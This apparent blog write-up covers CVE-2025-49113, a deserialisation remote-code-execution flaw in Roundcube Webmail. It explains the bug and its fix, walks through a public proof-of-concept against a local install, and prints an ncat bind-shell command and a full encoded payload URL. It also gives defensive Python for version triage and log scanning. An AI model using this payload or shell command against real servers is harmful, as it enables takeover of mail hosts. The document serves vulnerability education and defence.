Roundcube: CVE-2025–49113
Roundcube Webmail has been found to contain a critical vulnerability (CVSS 9.9) affecting the 1.5.x and 1.6.x versions. The vulnerability allows authenticated users to execute remote code because of unsafe deserialisation of the `_from` parameter in `upload.php`. Upgrading to version 1.5.10 or 1.6.11 is recommended to fix this issue. 2025-6-19 06:22:19 Author: infosecwriteups.com

Chetan Chinchulkar

Who am I?
I’m Chetan Chinchulkar (aka omnipresent), a cybersecurity enthusiast, software developer, and security researcher ranked in the top 2% on TryHackMe. Passionate about ethical hacking, CTFs, and software security, I spend my time breaking and fixing systems.
Let's connect on Twitter

Roundcube is a free and open-source webmail project. It is very feature-rich and available in over eighty languages. Although its built-in features are rich, they can be further expanded through the support of third-party plug-ins.

It mainly requires a web server with PHP support and an SQL server to run. Apache, Nginx, and Lighttpd, among others, can easily satisfy the web server requirements; MySQL, MariaDB, PostgreSQL, SQLite, and many others can satisfy the database requirements. This versatility makes Roundcube a very popular choice for webmail, especially among hosting providers.

Recently, a vulnerability was discovered in Roundcube Webmail; it affects all versions 1.5.x and 1.6.x before 1.5.10 and 1.6.11. This vulnerability allows remote code execution (RCE) by authenticated users; in other words, valid credentials for the webmail are enough for the attacker to execute commands on the host system. This vulnerability has a CVSS 3.x severity score of 9.9, i.e., critical. Roundcube has already released versions 1.5.10 and 1.6.11 and strongly recommends updating.
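Because the advisory scopes the problem to two branches with two different fixed releases, a version check that simply compares against "1.6.11" misclassifies 1.5.x hosts. The following added Python example (written here, not code from the article or from Roundcube) encodes the branch-aware rule stated above and triages a constructed inventory; the hostnames, the inventory format, and the handling of pre-release suffixes are assumptions.

```python
import re

# Fixed releases named in the advisory text above: 1.5.10 for the 1.5 branch, 1.6.11 for 1.6.
FIXED_RELEASE = {(1, 5): (1, 5, 10), (1, 6): (1, 6, 11)}


def parse_version(text):
    """Turn '1.6.10' or 'v1.5.9' into a tuple of ints.

    Assumption: a pre-release suffix such as '1.6.11-rc1' is ignored and treated
    as the final release; adjust if you track pre-release builds.
    """
    m = re.match(r"^v?(\d+)\.(\d+)\.(\d+)", text.strip())
    if not m:
        raise ValueError(f"unrecognised Roundcube version string: {text!r}")
    return tuple(int(x) for x in m.groups())


def is_affected(text):
    """True when the version sits on the 1.5 or 1.6 branch and is older than its fixed release.

    Branches the advisory does not mention (1.4.x, 1.7.x, ...) return False because
    they are outside the stated scope, not because they are known to be safe.
    """
    version = parse_version(text)
    fixed = FIXED_RELEASE.get(version[:2])
    return fixed is not None and version < fixed


def triage(inventory):
    """Map each host in a {host: version} inventory (constructed input) to a verdict."""
    return {host: ("UPDATE" if is_affected(ver) else "ok") for host, ver in inventory.items()}


if __name__ == "__main__":
    # Constructed inventory; hostnames and versions are illustrative only.
    sample = {"mail-a.example": "1.6.10", "mail-b.example": "1.5.10", "mail-c.example": "v1.5.3"}
    for host, verdict in triage(sample).items():
        print(f"{host}: {verdict}")
```

Note that `is_affected` deliberately answers False for branches the advisory does not list; treat that as "not in scope of this advisory" rather than "patched".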

Serialisation is the process of converting an object, i.e., a class instance in PHP, Java, or Python, into a storable or transmittable format. This process is commonly used for storing objects in files or databases and for sending objects across the network, such as in APIs or cookies.

A deserialisation vulnerability is a security flaw that occurs when an application deserialises untrusted or tampered data. Deserialisation is the process of converting data from a serialised format, such as a byte stream or a string, back into a program object. If this process is done insecurely, an attacker can manipulate the serialised data to execute arbitrary code or even escalate privileges, among other malicious actions.

Kirill Firsov discovered a deserialisation vulnerability in Roundcube Webmail. The researcher shared on their website the line of thought and research that led to the discovery; it is an interesting read. The vulnerability is caused by the _from parameter in upload.php not being thoroughly checked for safe values before deserialisation.

The fix can be seen in the commits for version 1.5.10 and for version 1.6.11. Even if you are not familiar with PHP, reading the changed lines and the comments gives a good idea of how the vulnerability was fixed. In the screenshot below, you can see that the added lines now check whether the URL parameter _from contains any unsafe characters.

This vulnerability allows remote code execution via insecure deserialisation. The attacker still needs to craft a payload whose deserialisation leads to the desired outcome.

Let's create a user to access the webmail at http://localhost/roundcube.

  • Username: user
  • Password: password123

Exploit Code

A proof-of-concept (PoC) exploit is published by FearsOff on their GitHub repository. The easiest way to follow along is to download the exploit code with git clone https://github.com/fearsoff-org/CVE-2025-49113.

The CVE-2025-49113.php script executes the steps needed to get the payload of your choice executed on the target server. After retrieving a CSRF token and a session cookie, the PoC logs in using the provided username and password. The core of the script lies in the following steps:

  • Craft a malicious serialised PHP object
  • Embed the crafted object in the _from parameter
  • Send a POST request to the upload.php endpoint using the malicious _from parameter

The received malicious parameter will be deserialised and executed on the server side.

Executing the Exploit

To run the PoC, the script takes the following arguments: php CVE-2025-49113.php target_url username password command.

  • The target_url should be replaced by Roundcube Webmail's URL, e.g., http://localhost:8080/roundcube
  • The username and password are the valid credentials to access the webmail that we created earlier
  • The command is the “payload” that you want to be executed on the target server

Let's use ncat -lvnp 1337 -e /bin/bash to set up a bind shell; this makes it easier to demonstrate the exploit and test whether it executed successfully.

Run this command in a terminal:

 php CVE-2025-49113.php http://localhost:8080/roundcube user password123 "ncat -lvnp 1337 -e /bin/bash"

We get the following output:

### Roundcube ≤ 1.6.10 Post-Auth RCE via PHP Object Deserialization [CVE-2025-49113]

### Retrieving CSRF token and session cookie...

### Authenticating user: user

### Authentication successful

### Command to be executed:
ncat -lvnp 1337 -e /bin/bash

### Injecting payload...

### End payload: http://localhost:8080/roundcube/?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C73%C70%C7%3A%C7%22%C7n%C7c%C7a%C7t%C7+%C7-%C7l%C7v%C7n%C7p%C7+%C74%C74%C74%C74%C7+%C7-%C7e%C7+%C7%2F%C7b%C7i%C7n%C7%2F%C7b%C7a%C7s%C7h%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

### Payload injected successfully

### Executing payload...

### Exploit executed successfully

!! You might have to run the exploit a few times before it executes successfully.

Now take the payload URL

http://localhost:8080/roundcube/?_from=edit-%21%C7%22%C7%3B%C7i%C7%3A%C70%C7%3B%C7O%C7%3A%C71%C76%C7%3A%C7%22%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%22%C7%3A%C71%C7%3A%C7%7B%C7S%C7%3A%C72%C76%C7%3A%C7%22%C7%5C%C70%C70%C7C%C7r%C7y%C7p%C7t%C7_%C7G%C7P%C7G%C7_%C7E%C7n%C7g%C7i%C7n%C7e%C7%5C%C70%C70%C7_%C7g%C7p%C7g%C7c%C7o%C7n%C7f%C7%22%C7%3B%C7S%C7%3A%C73%C70%C7%3A%C7%22%C7n%C7c%C7a%C7t%C7+%C7-%C7l%C7v%C7n%C7p%C7+%C74%C74%C74%C74%C7+%C7-%C7e%C7+%C7%2F%C7b%C7i%C7n%C7%2F%C7b%C7a%C7s%C7h%C7%3B%C7%23%C7%22%C7%3B%C7%7D%C7i%C7%3A%C70%C7%3B%C7b%C7%3A%C70%C7%3B%C7%7D%C7%22%C7%3B%C7%7D%C7%7D%C7&_task=settings&_framed=1&_remote=1&_id=1&_uploadid=1&_unlock=1&_action=upload

and open it in a browser while listening on port 1337.

Once you open the link, you'll get a connection on nc as shown.

We’re in…

This vulnerability only requires valid webmail credentials and works against default installations. The exploit can be hard to detect, since the request easily passes as regular traffic. Considering the severity, users running 1.5.x and 1.6.x are recommended to update to 1.5.10 and 1.6.11, respectively. If updating is infeasible for some reason, one mitigation is to block access to upload.php.
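The fix described earlier (reject _from values that contain unsafe characters) and the detection point made here call for the same check applied at two places: on the parameter before it reaches deserialisation, and over web-server access logs after the fact. The following added Python example (written here; it is neither Roundcube's code nor the article's PoC) does both. The character allowlist, the combined-format log layout and the sample log lines are assumptions; the third sample line carries a deliberately non-functional value that only shares the '!' and "O:" shape of a serialised object.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumed allowlist for _from: letters, digits, '-' and '_'. It mirrors the
# page's description of the fix (reject unsafe characters); the exact
# expression Roundcube uses is not taken from the project.
SAFE_FROM = re.compile(r"^[A-Za-z0-9_-]+$")

# Prefixes that open a PHP serialised object, string or array.
SERIALIZED_MARKERS = ("O:", "S:", "s:", "a:")

# Combined-format access log line (ip, timestamp, request line, status); assumed layout.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def is_safe_from(value):
    """Server-side validation: accept the percent-decoded _from only if every character is allowlisted."""
    return SAFE_FROM.fullmatch(value) is not None


def inspect_from(value):
    """Describe why a decoded _from value is suspicious, or return None when it passes."""
    if is_safe_from(value):
        return None
    reason = "characters outside the allowlist"
    if "!" in value:
        reason += "; contains '!'"
    if any(marker in value for marker in SERIALIZED_MARKERS):
        reason += "; PHP serialisation marker present"
    return reason


def scan_access_log(lines):
    """Return one finding per request to the settings upload action whose _from fails validation."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # parse_qs percent-decodes values; undecodable bytes become U+FFFD rather than raising.
        params = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        if params.get("_action") != ["upload"] or "_from" not in params:
            continue
        decoded = params["_from"][0]
        reason = inspect_from(decoded)
        if reason:
            findings.append({"ip": m["ip"], "time": m["ts"], "status": m["status"],
                             "from": decoded[:40], "reason": reason})
    return findings


# Constructed sample log lines: a benign upload, an unrelated request, and a
# suspicious _from that is not a working payload.
SAMPLE_LOG = [
    '10.0.0.5 - - [19/Jun/2025:06:22:19 +0000] "GET /roundcube/?_task=settings&_action=upload&_from=edit-identity&_id=1 HTTP/1.1" 200 512',
    '10.0.0.5 - - [19/Jun/2025:06:22:20 +0000] "GET /roundcube/?_task=mail&_action=list HTTP/1.1" 200 4096',
    '203.0.113.7 - - [19/Jun/2025:06:23:01 +0000] "GET /roundcube/?_task=settings&_framed=1&_action=upload&_from=edit-%21%22%3BO%3A1%3A%22X%22%3A0%3A%7B%7D&_id=1 HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
```

The log scan only sees parameters that travel in the query string, as they do in the URL printed by the PoC above; a parameter carried in a POST body never reaches the access log, so pair this with the server-side check (or with the upload.php block mentioned above) rather than relying on log review alone.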


Article source: https://infosecwriteups.com/roundcube-cve-2025-49113-22ec9ac88bce?source=rss----7b722bfd1b8d---4